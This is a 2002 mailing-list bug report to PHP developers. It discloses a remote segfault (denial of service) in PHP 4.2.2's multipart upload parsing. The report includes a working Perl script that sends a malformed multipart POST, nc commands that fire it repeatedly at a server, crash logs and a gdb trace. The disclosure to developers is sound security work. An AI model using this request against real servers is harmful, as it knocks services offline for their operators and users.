>---------- Forwarded message ---------- >Date: Wed, 24 Jul 2002 16:12:06 -0400 (EDT) >From: Dan Kalowsky <[EMAIL PROTECTED]> >To: [EMAIL PROTECTED] >Subject: Re: Bug #18547 Updated: Remote attacker can cause SIGSEGV > >Please send it to [EMAIL PROTECTED]
(Okay, that's easy enough -- I posted this in the web form, but it wrapped all to hell. Thanks for the email address, Mr. Kalowsky) Hello. While working on an exploit for the multipart_buffer_headers() hole that you just fixed, and I found another problem that you might want to look into. It looks like a DoS only, but there might be a way to execute arbitrary code and I just haven't found it yet. Credit for the find goes to myself and members of the [0dd] 0-Day Digest. Thanks, Thomas Cannon --- [root@spoon]# /usr/local/www/bin/apachectl start /usr/local/www/bin/apachectl start: httpd started [root@spoon]# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Wed, 24 Jul 2002 04:03:49 GMT Server: Apache/1.3.26 (Unix) PHP/4.2.2 X-Powered-By: PHP/4.2.2 Connection: close Content-Type: text/html Connection closed by foreign host. [root@spoon]# /usr/local/www/bin/httpd -l Compiled-in modules: http_core.c mod_env.c mod_log_config.c mod_mime.c mod_negotiation.c mod_status.c mod_include.c mod_autoindex.c mod_dir.c mod_cgi.c mod_asis.c mod_imap.c mod_actions.c mod_userdir.c mod_alias.c mod_access.c mod_auth.c mod_setenvif.c mod_php4.c suexec: disabled; invalid wrapper /usr/local/www/bin/suexec [root@spoon]# /* change over to my remote machine, stereophonic */ [tcannon@stereophonic]$ ./header.pl | nc noops.org 80 & [1] 90464 [tcannon@stereophonic]$ ./header.pl | nc noops.org 80 & [2] 90466 [tcannon@stereophonic]$ ./header.pl | nc noops.org 80 & [3] 90468 [tcannon@stereophonic]$ ./header.pl | nc noops.org 80 & [4] 90470 [tcannon@stereophonic]$ ./header.pl | nc noops.org 80 & [tcannon@stereophonic]$ more header.pl #!/usr/bin/perl headers(); sub headers { print "POST /vuln/upload.php HTTP/1.0\n"; print "Referer: http://www.noops.org\n"; print "Connection: Keep-Alive\n"; print "User-Agent: killer-loop.pl\n"; print "Host: www.noops.org\n"; print "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n"; print "Accept-Encoding: gzip\n"; print "Accept-Language: en\n"; print "Accept-Charset: iso-8859-1,*,utf-8\n"; print "Content-type: multipart/form-data; boundary=xnyLAaB03X\n"; print "Content-length: 246\n\n\n\n"; print "--xnyLAaB03X\n"; print "Content-Disposition: form-data; name="."A" x 100; } /* then back to spoon, the webserver... The 'reviewer' script is a little thing I whipped up to keep a note of where I last read the apache_log and error_log from, and it also weeds out the code red and nimda background noise -- you'd see this same output from 'tail' or a similar utility */ /* NOTE: 5 - 10 minutes need to pass to give apache time to segfault */ [root@spoon]# reviewer noops.org - - [23/Jul/2002:21:03:49 -0700] "HEAD / HTTP/1.0" 200 0 "-" "-" adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:15 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl" adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl" adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl" adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl" adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl" Now it's the error log... [Tue Jul 23 21:03:40 2002] [notice] Apache/1.3.26 (Unix) PHP/4.2.2 configured -- resuming normal operations [Tue Jul 23 21:03:40 2002] [notice] Accept mutex: flock (Default: flock) [Tue Jul 23 21:10:15 2002] [notice] child pid 31780 exit signal Segmentation fault (11) [Tue Jul 23 21:10:38 2002] [notice] child pid 31781 exit signal Segmentation fault (11) [Tue Jul 23 21:10:39 2002] [notice] child pid 31782 exit signal Segmentation fault (11) [Tue Jul 23 21:10:39 2002] [notice] child pid 31779 exit signal Segmentation fault (11) [Tue Jul 23 21:10:40 2002] [notice] child pid 31871 exit signal Segmentation fault (11) [root@spoon]# gdb /usr/local/www/bin/httpd 32839 GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... /usr/local/www/conf/32839: No such file or directory. Attaching to program: /usr/local/www/bin/httpd, process 32839 Reading symbols from /usr/lib/libpam.so.1...done. Reading symbols from /usr/lib/libcrypt.so.2...done. Reading symbols from /usr/lib/libm.so.2...done. Reading symbols from /usr/lib/libc.so.4...done. Reading symbols from /usr/libexec/ld-elf.so.1...done. 0x28265794 in read () from /usr/lib/libc.so.4 (gdb) info stack #0 0x28265794 in read () from /usr/lib/libc.so.4 #1 0x812002d in ap_read () #2 0x8121c41 in buff_read () #3 0x8121be7 in saferead_guts () #4 0x812064e in read_with_errors () #5 0x812087e in ap_bread () #6 0x81335ce in ap_get_client_block () #7 0x807a60a in sapi_apache_read_post () #8 0x8080576 in fill_buffer (self=0x823a30c) at rfc1867.c:178 #9 0x808072f in get_line (self=0x823a30c) at rfc1867.c:283 #10 0x808095d in multipart_buffer_headers (self=0x823a30c, header=0xbfbff5c4) at rfc1867.c:374 #11 0x8080fb5 in rfc1867_post_handler (content_type_dup=0x82055cc "multipart/form-data; boundary=xnyLAaB03X", arg=0x821f6ac) at rfc1867.c:663 #12 0x807f581 in sapi_handle_post (arg=0x821f6ac) at SAPI.c:110 #13 0x8082339 in php_treat_data (arg=0, str=0x0, destArray=0x0) at php_variables.c:251 #14 0x807d6df in php_hash_environment () at main.c:1149 #15 0x807ce33 in php_request_startup () at main.c:733 #16 0x8105bc2 in apache_php_module_main (r=0x8237034, display_source_mode=0) at sapi_apache.c:67 #17 0x807b02e in send_php () #18 0x807b082 in send_parsed_php () #19 0x8122665 in ap_invoke_handler () #20 0x8137928 in process_request_internal () #21 0x8137992 in ap_process_request () #22 0x812e487 in child_main () #23 0x812e710 in make_child () #24 0x812ea94 in perform_idle_server_maintenance () #25 0x812f011 in standalone_main () #26 0x812f654 in main () #27 0x8062e01 in _start () (gdb) n Single stepping until exit from function read, which has no line number information. Program received signal SIGTRAP, Trace/breakpoint trap. 0x28265794 in read () from /usr/lib/libc.so.4 (gdb) n Single stepping until exit from function read, which has no line number information. Program received signal SIGTRAP, Trace/breakpoint trap. 0x812b9dc in alrm_handler () (gdb) n Single stepping until exit from function alrm_handler, which has no line number information. Program received signal SIGSEGV, Segmentation fault. 0x80f6b8c in _zval_ptr_dtor (zval_ptr=0x81c433c) at zend_execute_API.c:272 272 zend_execute_API.c: No such file or directory. (gdb) info all-registers eax 0x0 0 ecx 0x8 8 edx 0x1 1 ebx 0x81c433c 136069948 esp 0xbfbff6b8 0xbfbff6b8 ebp 0xbfbff6d0 0xbfbff6d0 esi 0x81c433c 136069948 edi 0x2 2 eip 0x80f6b8c 0x80f6b8c eflags 0x10292 66194 cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47 (gdb) disassemble 0x80f6b8c Dump of assembler code for function _zval_ptr_dtor: 0x80f6b80 <_zval_ptr_dtor>: pushl %ebp 0x80f6b81 <_zval_ptr_dtor+1>: movl %esp,%ebp 0x80f6b83 <_zval_ptr_dtor+3>: subl $0x14,%esp 0x80f6b86 <_zval_ptr_dtor+6>: pushl %ebx 0x80f6b87 <_zval_ptr_dtor+7>: movl 0x8(%ebp),%ebx 0x80f6b8a <_zval_ptr_dtor+10>: movl (%ebx),%eax 0x80f6b8c <_zval_ptr_dtor+12>: decw 0xa(%eax) 0x80f6b90 <_zval_ptr_dtor+16>: movl (%ebx),%eax 0x80f6b92 <_zval_ptr_dtor+18>: movzwl 0xa(%eax),%edx 0x80f6b96 <_zval_ptr_dtor+22>: testw %dx,%dx 0x80f6b99 <_zval_ptr_dtor+25>: jne 0x80f6bbc <_zval_ptr_dtor+60> 0x80f6b9b <_zval_ptr_dtor+27>: addl $0xfffffff4,%esp 0x80f6b9e <_zval_ptr_dtor+30>: pushl %eax 0x80f6b9f <_zval_ptr_dtor+31>: call 0x80fcf88 <_zval_dtor> 0x80f6ba4 <_zval_ptr_dtor+36>: movl (%ebx),%eax 0x80f6ba6 <_zval_ptr_dtor+38>: addl $0x10,%esp 0x80f6ba9 <_zval_ptr_dtor+41>: cmpl 0x81c84d0,%eax 0x80f6baf <_zval_ptr_dtor+47>: je 0x80f6bcc <_zval_ptr_dtor+76> 0x80f6bb1 <_zval_ptr_dtor+49>: addl $0xfffffff4,%esp 0x80f6bb4 <_zval_ptr_dtor+52>: pushl %eax 0x80f6bb5 <_zval_ptr_dtor+53>: call 0x80f15d0 <_efree> 0x80f6bba <_zval_ptr_dtor+58>: jmp 0x80f6bcc <_zval_ptr_dtor+76> 0x80f6bbc <_zval_ptr_dtor+60>: cmpw $0x1,%dx 0x80f6bc0 <_zval_ptr_dtor+64>: jne 0x80f6bcc <_zval_ptr_dtor+76> 0x80f6bc2 <_zval_ptr_dtor+66>: cmpb $0x5,0x8(%eax) 0x80f6bc6 <_zval_ptr_dtor+70>: je 0x80f6bcc <_zval_ptr_dtor+76> 0x80f6bc8 <_zval_ptr_dtor+72>: movb $0x0,0x9(%eax) 0x80f6bcc <_zval_ptr_dtor+76>: movl 0xffffffe8(%ebp),%ebx 0x80f6bcf <_zval_ptr_dtor+79>: leave 0x80f6bd0 <_zval_ptr_dtor+80>: ret End of assembler dump. -- PHP Development Mailing List <http://www.php.net/> To unsubscribe, visit: http://www.php.net/unsub.php